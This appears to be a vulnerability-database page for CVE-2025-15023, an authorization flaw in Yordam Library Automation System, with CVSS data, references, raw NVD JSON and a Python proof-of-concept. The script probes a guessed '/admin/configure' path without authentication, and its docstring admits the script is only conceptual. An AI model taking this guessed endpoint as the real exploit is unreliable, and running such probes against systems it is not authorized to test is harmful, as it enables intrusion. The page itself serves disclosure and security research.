CVE-2025-15023

Description

Incorrect Authorization vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Library Automation System: from v.19.5 before v.22.1.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Yordam Library Automation System v19.5 至 v22.1 之前

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2025-15023 - Incorrect Authorization in Yordam Library Automation System
This script demonstrates checking for access control misconfiguration on a target endpoint.
Note: This is a conceptual example based on the vulnerability description.
"""
import requests

def check_authorization_bypass(target_url):
    """
    Attempts to access a restricted endpoint without proper authentication.
    """
    # Example endpoint that might be vulnerable (e.g., admin panel or user data)
    restricted_path = "/admin/configure"  
    full_url = f"{target_url}{restricted_path}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }

    try:
        # Send request without authentication cookies/tokens
        response = requests.get(full_url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Detected! Endpoint accessible without auth: {full_url}")
            print(f"[+] Response Length: {len(response.text)}")
        elif response.status_code in [301, 302, 403, 401]:
            print(f"[-] Access denied or redirect. Status code: {response.status_code}")
        else:
            print(f"[?] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_url>")
        print("Example: python3 poc.py http://target-library-system.com")
    else:
        check_authorization_bypass(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15023
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15023
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15023/
[4] VulDB https://vuldb.com/cve/CVE-2025-15023
[5] https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15023", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:34.527", "lastModified": "2026-05-14T18:19:37.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Authorization vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects Library Automation System: from v.19.5 before v.22.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240", "source": "[email protected]"}]}}